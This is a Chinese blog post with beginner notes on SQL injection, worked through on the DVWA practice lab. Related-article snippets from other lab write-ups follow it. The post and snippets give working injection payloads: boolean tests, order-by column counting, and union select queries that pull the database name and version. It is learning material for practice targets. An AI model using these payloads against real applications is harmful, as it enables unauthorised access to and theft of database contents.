再次了解——sql注入

最新推荐文章于 2022-09-29 16:23:08 发布
最新推荐文章于 2022-09-29 16:23:08 发布
阅读量2.6k 收藏
点赞数
文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60905276/article/details/122742785
版权

1.首先什么是sql注入呢?

sql注入是发生在web程序中的数据库层面的安全漏洞。sql注入指当设计的程序中检查不到位的话,用户在输入字符时加入sql语句将被数据库服务器执行。

2.sql注入的条件

一,首先传递到后端的参数是可控的

二,参数内容会被带到数据库里查询

3.做题思路

1.寻找通过web扫描工具注入点

2.通过注入点获取信息

3.猜解关键数据库表及重要字段与内容

4.通过用户信息,寻找后台登录

我们来做点题来看看吧。

dvwa——SQL Injection

1.low

首先判断一下是字符型还是数字型

1’ and ‘1’=’1和1’ and ‘1’=’2如果回显不同,那么就是字符型注入
1 and 1=1和1 and 1=2如果回显不同,那么就是数字型注入

它们区别在于

字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

判断出来是字符型

猜测SQL查询语句中的字段数

1' order by 1#

。。。

在第3次时有显示,所以字段应该有2

确定显示位置

1' union select 1,2#

ps.有多少个字段写多少个。

获取当前数据库

1' union select 1,database() #

ps.也可以查看该数据库版本

1' union select version(),database()#

 

获取数据库中表

但是dvwa好像出问题了,下次再看。

留将一面与花
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
5-5sqli手动测试-通过union进行数据获取
山兔的博客
05-03 968
我们本篇文章将讲述一下手工注入测试 SQL Inject手动测试-基于union的信息获取  Union联合查询、order by知识补充  “information_schema”数据库介绍  基于union联合查询的信息获取(select) SQL Inject漏洞手动测试:基于union联合查询的信息获取 union 联合查询:可以通过联合查询来查询指定的数据 用法举例: select username,password from user where id=1 union select 字段1
SQL注入中,为什么union联合查询,id必须等于0
分享与记录
05-11 1263
?id=0' union select 1,2,3 --+ ?id=0' union select 1,database(),3 --+ ?id=0' union select 1,database(),user() --+ 这里的 id 需要格外注意: 如果只有两个回显位置 那么 id 必须填写一个不存在的数(-1或者0),联合查询才能回显成功 因为在数据表中,id 为 1,2,3,…… 如果参数为: ?id=1' union select 1,2,3 --+ 那么查询语句就是: select *
sql注入之联合查询(Mysql
华丽的贵族
09-05 1212
联合注入 - 测试网站 phpstudy搭建的mysql网站 http://localhost/pentest/article.php?id=1 - 注入步骤 1.判断是否存在注入 输入and 1=1 未报错 输入and 1=2 报错 2.获取字段的总数: order by +数字 数字从1到4时4报错,所以网站字段为3 3.进行连接查询 http://localhost/pentest...
我的SQL注入学习:
weixin_46954909的博客
09-29 2308
经验总结
sql-labs11-20关
jinhezhai的博客
01-13 657
11-20关都为post传递,这里我们可以用burrp_suit来进行抓包和改包,也可以用hackbar来进行注入。 ##11关单引号闭合的联合注入 1.先使用1' or 1=1#来找到他的闭合方式。 登录成功单引号闭合。 2.-1' order by 3# 找有多少个字段。 报错,换成2不报错说明有两个字段。 3.你就可以愉快的使用联合注入了!我只把语句写一下,具体详情请见我另一篇博客。 (...
啊D——SQL注入工具
12-01
啊D注入工具
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
09-19
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
PHP——SQL注入测试靶场
05-27
利用PHP写的SQL注入靶场。可参考博客 https://blog.csdn.net/realmels/article/details/117338077
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
SQL注入-联合查询注入union
qq_57307348的博客
01-23 3459
目录 SQL注入的一库三表 union联合查询注入注意事项 MySQL函数利用 1、常用函数 2、连接字符串函数 联合查询注入union 利用前提 联合注入的过程 1、先判断有没有注入点 3、判断有多少列 4、判断显示位 5、显示有哪些数据库 6、显示数据库中有哪些表 7、显示表中有哪些字段(以users为例) 8、获取字段 SQL注入的一库三表 information_schema 元数据数据库 (数据库名, 表名, 字段...
pikachu靶场通关之sql注入系列
qq_51902218的博客
09-16 6422
1.判断是否注入(是否严格校验)(1)可控参数(id)能否影响页面显示(2)输入的SQL语句是否能报错(能通过数据库报错,看到数据库一些语句痕迹)(selectusername,passwordfromuserwhereid=?’)后面单引号或者双引号通过在URL中修改对应的id值,值为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URL中是否存在注入点(3)输入的SQL语句能否不报错(我们的语句能够成功闭合)(selectusername,passwordf。......
sql注入详解
m0_67392811的博客
06-12 5658
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL注入详解 1-6关
君莫hacker的博客
09-24 834
less-1 主页如图,参数id出存在sql注入 判断注入类型 输入1’让其报错,从报错信息我们可以看到这可能是单引号字符型注入 验证注入类型 #页面返回正常 http://192.168.30.212:8001/Less-1/?id=1' and 1=1--+ #页面返回不正常 http://192.168.30.212:8001/Less-1/?id=1' and 1=2--+ 所以该注入类型为单引号字符型 确定字段数 #返回正常 1' order by 3--+ #返回异常 1'
为什么sql注入的时候会写union select 1,2~~~~~from admin
被遗弃的庸才博客
04-15 1万+
我也是最近好奇才去学了一点web渗透的知识。在这之前还是需要一定的数据库的相关知识。这里假设知道当前表有多少列(这里设置为10),也可以直接通过order by直接测试出来。union 是联和查询的一个关键字,这个有一个前提就是必须满足所有的列是相同的,所以在这前面必须要添加一些没有意义的列来作为填充。这里给一个网站大家可以去看看,我忘记是在哪里看到了,反正可以用。http://www.joesd...
《WEB安全渗透测试》(1)SQL注入实战:union注入
午夜安全
09-30 9601
《WEB安全渗透测试》(1)SQL注入实战:union注入 1)判断是否存在注入URL:http://www.tianchi.com/web/union.php?id=1URL:http://www.tianchi.com/web/union.php?id=1'URL:http://www.tianchi.com/web/union.php?id=1 and 1=1URL:http://www.tianchi.com/web/union.php?id=1 and 1=2发现可能存在SQL注入漏洞。.....
php注射库
FreeXploiT
10-24 1300
php注射库作者:swap类别:漏洞资料库发布日期:2004-06-28 14:45:43总浏览:46 or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(9
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
SQL注入漏洞(2)注入方法2 union联合注入
weixin_51339377的博客
03-18 1651
1.估算目标的数据库语法(可能性很多) select username,password from tablex where id=' 2\' limit 0,1 select username,password from tablex where id=2 limit 0,1 select username,password from tablex where id=(2) limit 0,1 2.黑客需要破坏数据库语句目的是为了知道数据库的闭合方式 一旦出现报错即破环成功 这个世界上...
工资管理系统Python——sql
最新发布
06-08
在Python中,可以使用SQL语言操作数据库,实现工资管理系统的功能。以下是一个简单的示例: ```python import sqlite3 # 连接数据库 conn = sqlite3.connect('payroll.db') # 创建员工表 conn.execute('''CREATE ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值